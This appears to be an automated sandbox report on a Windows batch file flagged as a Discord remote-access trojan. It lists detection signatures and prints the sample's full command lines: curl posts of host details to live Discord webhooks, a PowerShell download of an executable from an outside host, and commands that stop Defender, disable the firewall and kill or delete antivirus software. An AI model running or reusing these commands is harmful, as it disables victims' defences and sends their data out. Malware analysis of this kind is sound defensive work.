Windows Analysis Report
main.bat.bin.bat

Overview

General Information

Sample name: main.bat.bin.bat
Analysis ID: 1526626
MD5: e9586e0e3590d13cc5a4c413b18efd12
SHA1: 697e5683ea6cc8a640d88959e893bf19e264aba4
SHA256: d0dd54a04d8c0ec90877013ed6314793ce52537f72143c35bdc2646c26dd3fae
Tags: bat, user-vm001cn

Detection

Discord Rat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected Discord Rat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to disable the Task Manager (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Suspicious Windows Service Tampering
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: Windows Firewall Disabled via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 2344 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 3700 cmdline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • WMIC.exe (PID: 2852 cmdline: wmic computersystem get manufacturer,model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 3032 cmdline: findstr /i "vmware virtualbox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • curl.exe (PID: 3524 cmdline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • net.exe (PID: 2100 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • net1.exe (PID: 6872 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • powershell.exe (PID: 6712 cmdline: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 6704 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 3684 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33AA.tmp" "c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • explorer.exe (PID: 6704 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 4424 cmdline: powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3272 cmdline: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6872 cmdline: powershell -Command "Stop-Process -Name MSASCui -Force -ErrorAction SilentlyContinue" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6364 cmdline: powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1372 cmdline: powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6168 cmdline: powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 1440 cmdline: powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4080 cmdline: powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • curl.exe (PID: 6364 cmdline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to change directory to 'C:\\Users\\Public\\Documents\\Secret Document'\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • curl.exe (PID: 4268 cmdline: curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • powershell.exe (PID: 6104 cmdline: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 3372 cmdline: powershell -Command "Invoke-RestMethod -Uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd' -Method Post -Body (@{content='Failed to download exe.exe'} | ConvertTo-Json) -ContentType 'application/json'" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 5868 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Yara matches
  • Source: main.bat.bin.bat, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
  • Source: C:\Users\Public\Documents\Secret Document\exe.exe, Rule: JoeSecurity_DiscordRat, Description: Yara detected Discord Rat, Author: Joe Security
  • Source: amsi64_6104.amsi.csv, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security

System Summary

Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , CommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , ProcessId: 6712, ProcessName: powershell.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), frack113, Data: Command: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", CommandLine: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", ProcessId: 3272, ProcessName: powershell.exe
Source: File created, Author: Florian Roth (Nextron Systems), Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 2344, TargetFilename: C:\Users\Public\Documents\Secret Document
Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", ProcessId: 6704, ProcessName: csc.exe
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6104, TargetFilename: C:\Users\Public\Documents\Secret Document\exe.exe
Source: Process started, Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro, Data: Command: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", CommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", ProcessId: 6104, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", CommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')", ProcessId: 6104, ProcessName: powershell.exe
Source: Threat created, Author: Perez Diego (@darkquassar), oscd.community, Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 6704, StartAddress: C70F51D0, TargetImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, TargetProcessId: 6704
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz", CommandLine: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz", ProcessId: 3700, ProcessName: curl.exe
Source: Process started, Author: frack113, Nasreddine Bencherchali, Data: Command: powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }", CommandLine: powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }", ProcessId: 1440, ProcessName: powershell.exe
Source: Process started, Author: Tim Rauch, Data: Command: powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False", CommandLine: powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False", ProcessId: 6364, ProcessName: powershell.exe
Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6712, TargetFilename: C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , CommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , ProcessId: 6712, ProcessName: powershell.exe
Source: Process started, Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems), Data: Command: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", CommandLine: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2344, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }", ProcessId: 3272, ProcessName: powershell.exe
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5868, ProcessName: svchost.exe

Data Obfuscation

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , ParentImage: 